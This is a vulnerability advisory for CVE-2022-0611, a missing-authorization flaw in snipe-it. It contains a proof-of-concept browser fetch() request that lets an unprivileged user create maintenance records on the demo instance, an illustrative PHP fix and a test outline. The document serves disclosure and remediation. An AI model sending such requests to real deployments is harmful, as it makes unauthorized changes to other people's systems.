Headline
CVE-2022-0611: Improper Privilege Management in snipe-it
Missing Authorization in Packagist snipe/snipe-it prior to 5.3.11.
Description
An unprivileged user can create a maintenance record for an asset.
Proof of Concept
1. Create a regular user and set every permission under Asset Models to DENY.
2. Log in as that user and send the request below to create a maintenance record for an asset.
// Run from the browser console while logged in as the unprivileged user.
// The session cookie is sent automatically ("credentials": "include") and the
// _token value is the CSRF token of that session, so the request passes the
// login and CSRF checks; nothing checks whether this user may touch asset 310.
await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
  "credentials": "include",
  "headers": {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1"
  },
  "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
  // asset_id names the target asset; the rest is an ordinary maintenance form.
  "body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin",
  "method": "POST",
  "mode": "cors"
});
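The bug class behind the request above is an object-level authorization gap: the handler verifies login and the CSRF token but never asks whether the current user may act on the asset named by asset_id. The following is an added illustration in the style of a Laravel controller, not Snipe-IT's own code or its actual 5.3.11 fix; the class, method, route and policy-ability names are assumptions.

```php
<?php
// Added illustration for CVE-2022-0611 (missing authorization on maintenance
// creation). NOT Snipe-IT's code or its real patch; names are assumptions.
namespace App\Http\Controllers;

use App\Models\Asset;
use App\Models\AssetMaintenance;
use Illuminate\Http\Request;

class AssetMaintenancesController extends Controller
{
    // BEFORE: the session and CSRF middleware already ran, so the code
    // assumes the caller is trusted. Any authenticated account can POST
    // asset_id=<any id> and a maintenance record is written for that asset.
    public function storeUnchecked(Request $request)
    {
        $maintenance = new AssetMaintenance();
        $maintenance->asset_id = $request->input('asset_id');
        $maintenance->title = $request->input('title');
        $maintenance->notes = $request->input('notes');
        $maintenance->save();

        return redirect()->route('maintenances.index'); // assumed route name
    }

    // AFTER: resolve the target object first, then authorize against it.
    // authorize() (AuthorizesRequests trait on the base Controller) throws an
    // AuthorizationException, rendered as HTTP 403, when the policy denies,
    // so no record is created for a user without rights on this asset.
    public function store(Request $request)
    {
        $asset = Asset::findOrFail($request->input('asset_id'));

        // 'update' is an assumed policy ability; the point is that the check
        // is made against the specific asset, not merely "is logged in".
        $this->authorize('update', $asset);

        $maintenance = new AssetMaintenance();
        $maintenance->asset_id = $asset->id;
        $maintenance->title = $request->input('title');
        $maintenance->notes = $request->input('notes');
        $maintenance->save();

        return redirect()->route('maintenances.index'); // assumed route name
    }
}
```

A regression test for this class of bug logs in as a user with the relevant permissions denied, posts the form with another asset's id, and asserts a 403 and no new row in the maintenances table.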
Impact
An unprivileged user can create maintenance records for any asset.
Occurrences